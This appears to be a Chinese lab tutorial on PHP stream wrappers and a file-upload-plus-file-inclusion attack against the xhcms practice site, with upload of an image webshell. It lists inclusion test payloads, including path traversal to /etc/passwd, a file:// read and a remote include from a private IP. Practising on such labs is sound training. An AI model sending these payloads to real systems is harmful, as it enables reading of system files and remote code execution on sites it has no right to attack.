w24文件上传之PHP伪协议

PHP支持的伪协议

file:// - 访问本地文件系统
http:// - 访问网址
ftp:// - 访问文件
php:// -访问各个输入/输出流
zlib:// -压缩流
data:// - 数据
glob:// -查找匹配的文件路径模式
phar:// - php归档
ssh2:// - Secure shell 2
rar:// - RAR
ogg:// - 音频流
expect:// - 处理交互式的流

各协议的利用条件和方法

w24文件上传之PHP伪协议_第1张图片

熊海靶场安装(xhcms)

安装环境

burp2024
phpstudy 5.3.29nts+apache
火狐浏览器(谷歌浏览器不能找到文件包含漏洞)

1.创建网站
w24文件上传之PHP伪协议_第2张图片
2.安装靶场

w24文件上传之PHP伪协议_第3张图片
3.输入正确的数据库用户名和密码,自动导入,此时php的版本不要太高,不能选择7.x以上的本吧。选择5.2~5.3的版本即可,否则页面的内容展示不了。
w24文件上传之PHP伪协议_第4张图片
4.在发布文章,有图片的上传点,开始爆破。
w24文件上传之PHP伪协议_第5张图片
5.上传一个包含phpinfo的图片马,返回文件上传后的路径/upload/watermark/20581706431088.gif
w24文件上传之PHP伪协议_第6张图片
6.成功上传,要解析图片马,需要找到文件包含漏洞,根据文件包含的特征,匹配网站内的请求

文件包含漏洞的特征
?page=a.php
?home=b.html
?file=content
检测方法
?file=../../../../etc/passwd
?page=file:///etc/passwd
?home=main.cgi
?page=http://192.168.189.78/1.txt
http://1.1.1.1/../../../../dir/file.txt

在首页的美国时间,找到的文件包含漏洞,该路径包含了ustime.php文件。

w24文件上传之PHP伪协议_第7张图片

7.拼接请求
w24文件上传之PHP伪协议_第8张图片

你可能感兴趣的:(php,php,开发语言)